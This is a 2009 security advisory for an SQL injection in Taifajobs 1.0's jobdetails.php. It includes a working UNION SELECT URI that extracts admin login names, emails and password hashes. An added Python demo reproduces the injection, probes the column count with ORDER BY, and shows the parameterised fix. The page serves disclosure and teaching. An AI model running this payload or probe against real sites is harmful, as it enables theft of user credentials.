Written by K-159   
Tuesday, 31 March 2009 22:46
Taifajobs 'jobdetails.php' SQL Injection Vulnerability


-\\Bugtraq ID:
33864

-\\Class:
Input Validation Error

-\\CVE:


-\\Remote:
Yes

-\\Local:
No

-\\Published:
Feb 23 2009 12:00AM

-\\Updated:
Mar 31 2009 06:26PM

-\\Credit:
K-159



-\\Vulnerable:
Tony Iha Kazungu Taifajobs 1.0



-\\Discussion
Taifajobs (Job Recruitment System) is prone to an SQL-injection vulnerability because
it fails to sufficiently sanitize user-supplied data passed in the 'jobid' parameter of
'jobdetails.php' before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database.

Taifajobs 1.0 is vulnerable; other versions may also be affected.



-\\Exploit(s)/PoC(s):
Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/[path]/jobdetails.php?jobid=-5 union select 1,2,3,4,5,6,concat(admin,0x3a,email,0x3a,loginname,0x3a,pass),8,9,0,1,2,3,4,5,6,7,8,9,0 from users--

The negative 'jobid' value makes the original query return no row, so only the row
produced by the UNION SELECT is rendered. The 20 values in the UNION must match the
column count of the original query; the seventh position carries the concatenated
'users' record, with 0x3a as a hex literal for the ':' separator, and the trailing
'--' comments out the rest of the original statement.



-\\Solution
Vendor updates are available. Please contact the vendor for details on obtaining and
applying the appropriate updates. Until the update is applied, cast 'jobid' to an
integer before it reaches the query, or pass it to the database through a prepared
statement with a bound parameter rather than by string concatenation.
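The following is an added example, written for this page, that models both the flaw
behind the PoC above and the parameterised fix described under Solution; it is not
Taifajobs' own code (which is PHP against MySQL). It uses an in-memory SQLite database
with constructed sample rows. The 'users' table and its columns (admin, email,
loginname, pass) are taken from the PoC; the 'jobs' table with four columns, the sample
values and the handler names are assumptions. The payload is rewritten in SQLite syntax
('||' and ':' in place of MySQL's concat() and 0x3a, and four UNION columns instead of
the twenty the real query needs). It also goes one step beyond the advisory by showing
the ORDER BY probe an attacker uses to recover that column count.

```python
import sqlite3

# Constructed sample schema and rows. The users table and its columns
# (admin, email, loginname, pass) are named in the advisory's PoC; the
# jobs table with four columns is an assumption made for this model.
SCHEMA = """
CREATE TABLE jobs (jobid INTEGER PRIMARY KEY, title TEXT, company TEXT, location TEXT);
CREATE TABLE users (admin TEXT, email TEXT, loginname TEXT, pass TEXT);
INSERT INTO jobs VALUES (5, 'Web Developer', 'Example Ltd', 'Nairobi');
INSERT INTO users VALUES ('1', 'admin@example.com', 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""

# The advisory's payload translated from MySQL to SQLite syntax:
# concat(a,0x3a,b) becomes a||':'||b, and the UNION carries four values
# because the model query selects four columns (the real query needs twenty).
PAYLOAD = ("-5 union select 1,2,"
           "admin||':'||email||':'||loginname||':'||pass,4 from users--")


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def jobdetails_vulnerable(conn, jobid):
    """Models the flaw: the jobid request parameter is spliced into the SQL text."""
    sql = "SELECT jobid, title, company, location FROM jobs WHERE jobid=" + jobid
    return conn.execute(sql).fetchall()


def jobdetails_fixed(conn, jobid):
    """Hardened form: reject non-integer input, then bind the value as a parameter."""
    if not jobid.lstrip("-").isdigit():
        raise ValueError("jobid must be an integer")
    sql = "SELECT jobid, title, company, location FROM jobs WHERE jobid=?"
    return conn.execute(sql, (int(jobid),)).fetchall()


def find_column_count(conn, handler, limit=30):
    """Recover the column count of the injected query with ORDER BY n probes.

    ORDER BY n errors out once n exceeds the number of selected columns, so the
    last n that succeeds is the count the UNION must match (twenty for the real
    jobdetails.php query, judging by the PoC).
    """
    for n in range(1, limit + 1):
        try:
            handler(conn, "-5 order by %d--" % n)
        except sqlite3.OperationalError:
            return n - 1
    return None


def dump_users(conn):
    """Send the UNION payload through the vulnerable handler; return the leaked records."""
    rows = jobdetails_vulnerable(conn, PAYLOAD)
    return [row[2] for row in rows]  # third column carries the concatenated user record


if __name__ == "__main__":
    conn = open_db()
    print("columns in injected query:", find_column_count(conn, jobdetails_vulnerable))
    print("leaked via UNION:", dump_users(conn))
    try:
        jobdetails_fixed(conn, PAYLOAD)
    except ValueError as exc:
        print("fixed handler rejected payload:", exc)
```

Running the script prints the recovered column count (4 in this model), the leaked
admin record in the same admin:email:loginname:pass layout the PoC produces, and the
rejection raised by the fixed handler. The integer check alone would stop this payload;
the bound parameter is what keeps the fix correct for string parameters elsewhere.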



-\\Reference(s)
--Taifajobs Homepage
http://sourceforge.net/projects/taifajobs  (Tony Iha Kazungu)
--[ECHO_ADV_103$2009] taifajobs <= 1.0 (jobid) Remote SQL Injection Vulnerability
http://www.securityfocus.com/archive/1/50118
--Re: [ECHO_ADV_103$2009] taifajobs <= 1.0 (jobid) Remote SQL Injection Vulnerability
http://www.securityfocus.com/archive/1/50231